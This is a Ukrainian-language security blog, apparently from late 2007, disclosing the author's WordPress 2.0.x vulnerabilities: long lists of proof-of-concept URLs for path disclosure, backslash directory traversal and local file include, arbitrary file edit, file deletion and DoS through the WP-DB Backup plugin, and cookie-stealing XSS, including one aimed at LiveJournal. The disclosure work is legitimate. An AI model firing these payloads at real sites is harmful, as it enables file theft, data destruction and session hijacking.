Websecurity - Веб безпека

Поздоровляю усіх вас з Новим Роком!

Бажаю в наступному 2008 році більше безпеки вам і вашим сайтам.

В якості подарунку на вас чекає святкова уразливість . А також уразливості в WordPress, що були оприлюднені мною в День багів в WordPress.

Веселих свят!

Продовжу оприлюднювати численні уразливості в WP в День багів в WordPress. Про деякі подібні уразливості я писав раніше.

В грудні, 22.12.2007, я знайшов Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах index.php, link-manager.php, link-add.php, link-categories.php, link-import.php, theme-editor.php, plugins.php, plugin-editor.php, profile.php, users.php, options-general.php, options-writing.php, options-reading.php, options-discussion.php, options-permalink.php, options-misc.php, import.php, admin.php, bookmarklet.php, cat-js.php, inline-uploading.php, options.php, profile-update.php, sidebar.php, user-edit.php (в параметрі page), а також в файлах admin-footer.php, admin-functions.php, edit-form.php, edit-form-advanced.php, edit-form-comment.php, edit-link-form.php, edit-page-form.php, menu.php, menu-header.php, blogger.php, dotclear.php, greymatter.php, livejournal.php, mt.php, rss.php, textpattern.php.

Full path disclosure:

http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows).

Local file include та Directory traversal:

http://site/wp-admin/index.php?page=\..\..\file.php
http://site/wp-admin/index.php?page=\..\..\.htaccess
http://site/wp-admin/link-manager.php?page=\..\..\.htaccess
http://site/wp-admin/link-add.php?page=\..\..\.htaccess
http://site/wp-admin/link-categories.php?page=\..\..\.htaccess
http://site/wp-admin/link-import.php?page=\..\..\.htaccess
http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess
http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess
http://site/wp-admin/profile.php?page=\..\..\.htaccess
http://site/wp-admin/users.php?page=\..\..\.htaccess
http://site/wp-admin/options-general.php?page=\..\..\.htaccess
http://site/wp-admin/options-writing.php?page=\..\..\.htaccess
http://site/wp-admin/options-reading.php?page=\..\..\.htaccess
http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess
http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess
http://site/wp-admin/options-misc.php?page=\..\..\.htaccess
http://site/wp-admin/import.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess
http://site/wp-admin/cat-js.php?page=\..\..\.htaccess
http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess
http://site/wp-admin/options.php?page=\..\..\.htaccess
http://site/wp-admin/profile-update.php?page=\..\..\.htaccess
http://site/wp-admin/sidebar.php?page=\..\..\.htaccess
http://site/wp-admin/user-edit.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Сьогодні, в День багів в WordPress, я оприлюднюю численні уразливості в WP. Про деякі подібні уразливості я писав раніше.

В грудні, 02.12.2007 (в templates.php) і 22.12.2007, я знайшов Arbitrary file edit, Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлі templates.php (в параметрах file та page) та файлах edit-pages.php, categories.php, edit-comments.php, moderation.php, post.php та page-new.php (в параметрі page).

Full path disclosure:

http://site/wp-admin/templates.php?file= (працює тільки в WP 2.0.11)
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows).

Arbitrary file edit:

http://site/wp-admin/templates.php?file=\..\..\file

Local file include та Directory traversal:

http://site/wp-admin/templates.php?page=\..\..\file.php
http://site/wp-admin/templates.php?page=\..\..\.htaccess
http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess
http://site/wp-admin/categories.php?page=\..\..\.htaccess
http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess
http://site/wp-admin/moderation.php?page=\..\..\.htaccess
http://site/wp-admin/post.php?page=\..\..\.htaccess
http://site/wp-admin/page-new.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

В цьому місяці я багато писав про уразливості в WordPress. Як про уразливості, що були виявлені в Вордпресі різними секюріті дослідниками, так і про уразливості знайдені мною в движку в цьому році. А також оприлюднив уразливості в одному плагіні для WP.

І сьогодні я вирішив провести новий цікавий проект - День багів в WordPress (Day of bugs in WordPress). Сьогодні я опублікую ще чималу кількість уразливостей, котрі я знайшов в WP в цьому році.

Серед виявлених мною уразливостей в движку, що я вже оприлюднив в грудні, були наступні:

• Information disclosure уразливості в WordPress (деталі)
• XSS уразливості в WordPress 2.0.x (деталі)
• Cross-Site Scripting в WordPress 2.0.x (деталі)
• XSS уразливості в WordPress 2.0.x (деталі)
• Directory traversal, Arbitrary file deletion, DoS та XSS в WordPress (деталі)
• Local file include, Directory traversal та Full path disclosure в WordPress (деталі)
• Нові Local file include, Directory traversal та Full path disclosure в WordPress (деталі)

В жовтні, 31.10.2007 (в edit.php), і в листопаді, 29.11.2007 (в admin.php), я знайшов нові Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах edit.php та admin.php в параметрі page.

Full path disclosure:

http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше.

Local file include та Directory traversal:

http://site/wp-admin/edit.php?page=\..\..\file.php
http://site/wp-admin/edit.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\file.php
http://site/wp-admin/admin.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

В червні, 09.06.2007 (в admin.php) і 15.06.2007 (в themes.php), я знайшов Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах admin.php (параметр import) та themes.php (параметр page).

Full path disclosure:

http://site/wp-admin/admin.php?import=\..\..\wp-config
http://site/wp-admin/themes.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше.

Local file include та Directory traversal:

http://site/wp-admin/admin.php?import=\..\..\file
http://site/wp-admin/themes.php?page=\..\..\file.php
http://site/wp-admin/themes.php?page=\..\..\.htaccess

В файлі admin.php через параметр import можна лише підключити файли з php розширенням.

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

В червні, 05.06.2007, я знайшов Directory traversal, Arbitrary file deletion та Denial of Service уразливості в WordPress. А 28.10.2007 ще додатково Cross-Site Scripting уразливість. Дірки в файлі wp-db-backup.php - в плагіні WordPress Database Backup.

В минулому році була знайдена Directory traversal уразливість в плагіні WordPress WP-DB Backup. Котра була виправлена в WP 2.0.4.

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Як я виявив даний плагін також вразливий до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше стосовно іншої дірки в цьому движку - Local file include та Directory traversal в WordPress.

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Ця дірка також вже була виправлена в WP 2.0.4. Тому вразлива WordPress 2.0.3 і попередні версії. Окрім Directory traversal, я ще виявив інші уразливості.

Також можливо видалити довільний файл на сервері (на котрий має права даний користувач). Тому що плагін WordPress Database Backup видаляє файли, до котрих відбувається запит - причому незалежно від того, чи скачає користувач файл, чи ні, в будь-якому випадку файл видаляється.

Arbitrary file deletion:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Це також може бути використано для проведення DoS-атаки. При видаленні index.php сайт перестане нормально функціонувати.

DoS:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php

Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php

Вразлива WordPress 2.0.3 і попередні версії.

XSS:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Нещодавно мені повідомив читач мого сайту про Cross-Site Scripting уразливість на популярному блог сервіс Livejournal.com. Як я вчора перевірив, уразливість мала місце. На сайті LJ на сторінці update.bml була reflected та DOM based XSS в параметрі usejournal.

XSS:

http://www.livejournal.com/update.bml?usejournal=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Коли я сьогодні вирішив написати про це, вияснилось, що власники Livejournal вже виправили цю дірку (їм явно про неї повідомили). Але я швиденько знайшов дві нові XSS , про які повідомлю найближчим часом.

Також сайт вразливий до Expect HTML Injection і ця дірка досі не виправлена. Так що власникам Livejournal потрібно краще слідкувати за безпекою власного сервісу.

Ще в січні були оприлюднені DoS (віддалений і локальний) та File Disclosure уразливості в WordPress. Вразливі версії WordPress до 2.1.

• Multiple Remote Vulnerabilities in Wordpress (деталі)

Denial of Service та File Disclosure дірки наявні в XMLRPC та Pingback реалізаціях в движку. Дані уразливості були виправлені в нових версіях WP.

Нещодавно, 18.12.2007, я знайшов нові Cross-Site Scripting уразливості в WordPress. Дірки в файлах theme-editor.php, themes.php та profile-update.php. Вразливі WordPress 2.0.7 і попередні версії.

XSS:

http://site/wp-admin/theme-editor.php?file=wp-content/themes/default/style.css&theme=WordPress+Default&action=update&xss=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/themes.php?action=activate&stylesheet=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/themes.php?action=activate&template=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://sites/wp-admin/themes.php?action=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/profile-update.php?xss=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

В кінці минулого року я писав про подібні уразливості в WordPress. Тому дані уразливості - це доповнення до раніше знайдених мною дір в WP 2.0.x. У версії WordPress 2.0.9 вони вже виправлені.